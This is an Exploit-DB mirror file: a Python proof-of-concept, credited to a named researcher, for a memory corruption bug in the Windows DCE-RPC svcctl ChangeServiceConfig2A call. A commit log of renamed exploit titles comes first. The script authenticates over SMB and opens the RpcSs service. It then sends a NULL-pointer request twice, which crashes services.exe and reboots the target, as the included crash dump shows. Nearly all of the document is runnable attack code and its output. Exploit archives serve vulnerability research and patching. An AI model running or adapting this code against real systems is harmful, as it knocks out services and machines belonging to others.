exploit-db-mirror/platforms/windows/dos/3453.py
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00


#!/usr/bin/python
# MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on Windows 2000 SP4 Polish (all patches)
#
# Requires..
# - Impacket : http://oss.coresecurity.com/projects/impacket.html
# - PyCrypto : http://www.amk.ca/python/code/crypto.html
#
# Details:..
#
# [exploit] Session Setup AndX Request, User: Administrator --> [target]
# [exploit] Session Setup AndX Response <-- [target]
# [exploit] Tree Connect AndX Request --> [target]
# [exploit] Tree Connect AndX Response <-- [target]
# [exploit] NT Create AndX Request, Path: \svcctl --> [target]
# [exploit] NT Create AndX Response, Fid: 0x4000 <-- [target]
# [exploit] DCERPC Bind UUID: SVCCTL --> [target]
# [exploit] DCERPC Bind_ack <-- [target]
# [exploit] SVCCTL OpenSCManagerW request --> [target]
# [exploit] SVCCTL OpenSCManagerW response(handle) <-- [target]
# [exploit] SVCCTL OpenServiceW request --> [target]
# [exploit] SVCCTL OpenServiceW response(handle) <-- [target]
# [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
# [exploit] DCERPC Fault: status: unknwon(0xc00000fd) <-- [target]
# [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
# [exploit] SMB Trans Response, Error: Unknown DoS Error <-- [target](crashed)
#
# [Module services]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
# -------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=004D83C0: 28 83 4D 00 48 84 4D 00-34 84 4D 00 48 61 08 00
# ECX=00000890: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ESP=015BF8C0: 34 F9 5B 01 00 00 00 00-00 FB 5B 01 00 00 00 00
# EBP=015BF8F4: 30 F9 5B 01 AD 20 01 01-B8 FB 0D 00 01 00 00 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=01017000: 90 9C 07 00 FF FF FF FF-00 00 00 00 00 00 00 00
# EIP=010108A8: FF 30 68 90 A5 00 01 FF-75 FC E8 CF 1D 00 00 8B
# --> PUSH DWORD PTR [EAX]
#
# [Process services.exe terminated, system reboot]
#
# Just for fun ;]
##
from impacket.structure import Structure
from impacket.dcerpc import transport
from impacket import uuid
from random import randint
from time import sleep
# Target and the credentials used for the authenticated SMB session
# (the PoC logs on before it ever reaches the svcctl pipe).
host = '192.168.0.1'
username = 'Administrator'
password = 'Administrator_Password'
# (pipe name, interface UUID, interface version) of the svcctl endpoint.
interface = ('svcctl', '367abb81-9844-35f1-ad32-98f038001003', '2.0')
# Named-pipe string binding of the form ncacn_np:<host>[\pipe\<pipe>].
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]" % {
    'host': host,
    'pipe': interface[0],
}
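# random dword
def dword_rand():
    """Return a random unsigned 32-bit value in 0 .. 0xFFFFFFFF inclusive.

    The value is packed into a ``<L`` field by ``rpcstr`` (the referent id of
    an RPC string).  ``randint`` is inclusive at both ends, so the original
    upper bound of ``256 ** 4`` could produce ``2**32``, which does not fit
    the field; ``0xFFFFFFFF`` is the correct maximum.
    """
    return randint(0, 0xFFFFFFFF)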
# unicode string
def utf16(str):
    """Encode *str* as little-endian UTF-16 with no byte-order mark.

    This is the wide-string form ``rpcstr`` uses when ``unicode_string`` is 1.
    """
    encoded = str.encode('utf_16_le')
    return encoded
# MS RPC string
def rpcstr(str, id = 1, unicode_string = 1):
    """Build a counted-string argument for an RPC request.

    Args:
        str: the text to send; a terminating NUL, if wanted, must already
            be part of it (callers append ``\\x00`` themselves).
        id: when 1 a random referent id (``dword_rand``) is prepended to
            the counts; any other value omits the field.
        unicode_string: when 1 the text is sent as UTF-16LE via ``utf16``,
            otherwise it is sent exactly as given.

    Returns an impacket ``Structure`` whose ``max`` and ``actual`` counts are
    both ``len(str)`` (character count, not byte count) and whose ``offset``
    is always 0.
    """
    referent = (('id', '<L'),) if id == 1 else ()
    counted = (
        ('max', '<L'),
        ('offset', '<L=0'),
        ('actual', '<L'),
        ('str', '%s'),
    )

    class foo(Structure):
        alignment = 4
        structure = referent + counted

    query = foo()
    if id == 1:
        query['id'] = dword_rand()
    length = len(str)
    query['max'] = length
    query['actual'] = length
    query['str'] = utf16(str) if unicode_string == 1 else str
    return query
# MS RPC OpenSCManager
def OpenSCManager(host, access = 1):
    """Build the svcctl OpenSCManagerW request (opnum 0x0f).

    Args:
        host: machine name; it is sent UNC-style (two leading backslashes)
            with a trailing NUL, as a unicode ``rpcstr`` with a referent id.
        access: desired access mask written to the ``access`` field.

    Returns an impacket ``Structure`` carrying ``opnum`` for ``dce.call``.
    """
    layout = (
        ('str1', ':'),
        ('null', '<L=0'),
        ('access', '<L'),
    )

    class foo(Structure):
        opnum = 0x0f
        structure = layout

    machine_name = "\\\\%s\x00" % (host)
    query = foo()
    query['str1'] = rpcstr(machine_name)
    query['access'] = access
    return query
# MS RPC OpenServiceW
def OpenService(handle, service, access = 1):
    """Build the svcctl OpenServiceW request (opnum 0x10).

    Args:
        handle: the 20-byte SCM context handle returned by OpenSCManagerW.
        service: service name; sent NUL-terminated as a unicode ``rpcstr``
            without a referent id (``id=0``).
        access: desired access mask written to the ``access`` field.

    Returns an impacket ``Structure`` carrying ``opnum`` for ``dce.call``.
    """
    layout = (
        ('handle', ':'),
        ('str1', ':'),
        ('access', '<L'),
    )

    class foo(Structure):
        opnum = 0x10
        structure = layout

    service_name = "%s\x00" % (service)
    query = foo()
    query['handle'] = handle
    query['str1'] = rpcstr(service_name, 0)
    query['access'] = access
    return query
# Authenticated SMB session to the target, then a DCE/RPC bind to the
# svcctl interface over the named pipe.  Everything below runs after a
# successful logon with the configured credentials, so the fault is only
# reachable by an authenticated caller.
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_credentials(username, password)
trans.connect()
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))
# OpenSCManagerW: the first 20 bytes of the reply are taken as the SCM
# context handle (no status check is done on the response).
query = OpenSCManager(host, access = 1)
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]
# OpenServiceW on "RpcSs"; the service handle replaces the SCM handle.
query = OpenService(handle, "RpcSs", access = 0xF01FF)
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]
##
# ChangeServiceConfig2A() [IDL code generated by mIDA v1.0.7]
#
# typedef struct struct_1 {
# long elem_1;
# [switch_is(elem_1)] union union_2 elem_2;
# } struct_1 ;
#
# typedef [switch_type( unsigned long )] union union_2 {
# [case(1)] struct struct_3 * elem_1;
# [case(2)] struct struct_4 * elem_2;
# } union_2;
#
# typedef struct struct_3 {
# [string] char * elem_1;
# } struct_3 ;
#
#
# /* opcode: 0x24, address: 0x0101203B */
#
# long sub_101203B (
# [in][context_handle] void * arg_1,
# [in] struct struct_1 arg_2
# );
##
class ChangeServiceConfig2A(Structure):
    """Wire layout of the svcctl ChangeServiceConfig2A request (opnum 0x24).

    Mirrors the mIDA-recovered IDL above: a context handle followed by
    ``struct_1`` whose switch selects ``case 1`` (``struct_3 *``).  The
    pointer is sent as a NULL referent, which the crash log in the header
    shows being dereferenced by services.exe.
    """
    opnum = 0x24
    structure = (
        ('context_handle', ':'),
        ('switch_is', '<L=1'),
        ('case', '<L=1'),
        ('struct_3', '<L=0x00000000'),  # <-- vulnerable argument (NULL pointer)
    )
query = ChangeServiceConfig2A()
query['context_handle'] = handle
# Sent twice with a one-second pause; per the session log in the header the
# first call returns a DCERPC fault and the second one crashes services.exe.
# No response is read between the calls.
for i in range(0, 2):
    dce.call(query.opnum, query)
    sleep(1)
dce.disconnect()
# EoF
# milw0rm.com [2007-03-10]